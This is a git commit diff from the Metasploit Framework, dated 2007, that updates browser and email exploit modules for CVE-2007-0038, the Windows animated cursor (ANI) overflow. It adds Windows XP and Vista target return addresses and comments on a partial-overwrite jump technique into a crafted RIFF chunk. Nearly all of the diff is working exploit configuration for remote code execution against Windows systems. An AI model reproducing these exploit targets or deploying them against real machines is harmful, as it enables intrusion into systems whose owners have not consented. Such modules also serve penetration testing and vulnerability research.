Fixes #87. Adds new targets to the ANI exploits, fixes Vista target for OE

git-svn-id: file:///home/svn/framework3/trunk@4795 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-28 18:32:36 +00:00
parent ca1f4f5cdc
commit 7d7f244bf6
2 changed files with 42 additions and 8 deletions

View File

@ -97,15 +97,36 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Should work for English 2000 SP0-SP4+
[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
#
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
# of the RIFF chunk itself. The length field of the RIFF chunk
# tag contains a short jump into an embedded riff chunk that
# makes a long relative jump into the actual payload.
#
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
[ 'Windows Vista user32.dll 6.0.6000.16386',
{
'Ret' => 0x700b,
'Len' => 2,
# On Vista, the pages that contain the RIFF are read-only.
# In-place decoders cannot be used.
'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
}
],
#
# Supplied by ramon[at]risesecurity.org
#
# call [ebx+4]
[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
# call [esi+4]
[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
],
'DisclosureDate' => 'Mar 28 2007',
'DefaultTarget' => 0))

View File

@ -96,7 +96,6 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Should work for English 2000 SP0-SP4+
[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
#
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
# of the RIFF chunk itself. The length field of the RIFF chunk
@ -112,7 +111,21 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# In-place decoders cannot be used.
'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
}
]
],
#
# Supplied by ramon[at]risesecurity.org
#
# call [ebx+4]
[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
# call [esi+4]
[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
],
'DisclosureDate' => 'Mar 28 2007',
'DefaultTarget' => 0))